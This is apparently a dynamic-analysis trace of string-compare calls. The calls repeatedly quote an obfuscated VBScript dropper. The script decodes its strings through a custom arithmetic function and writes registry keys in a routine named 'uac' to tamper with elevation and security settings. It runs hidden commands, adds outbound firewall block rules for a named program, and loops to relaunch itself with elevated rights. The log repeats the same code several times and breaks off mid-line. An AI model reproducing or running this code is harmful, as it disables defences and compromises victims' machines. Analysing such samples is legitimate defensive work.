bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.941] wcsncmp (_String1="1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.941] wcsncmp (_String1=")) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.941] wcsncmp (_String1=") - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.941] wcsncmp (_String1=" - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run 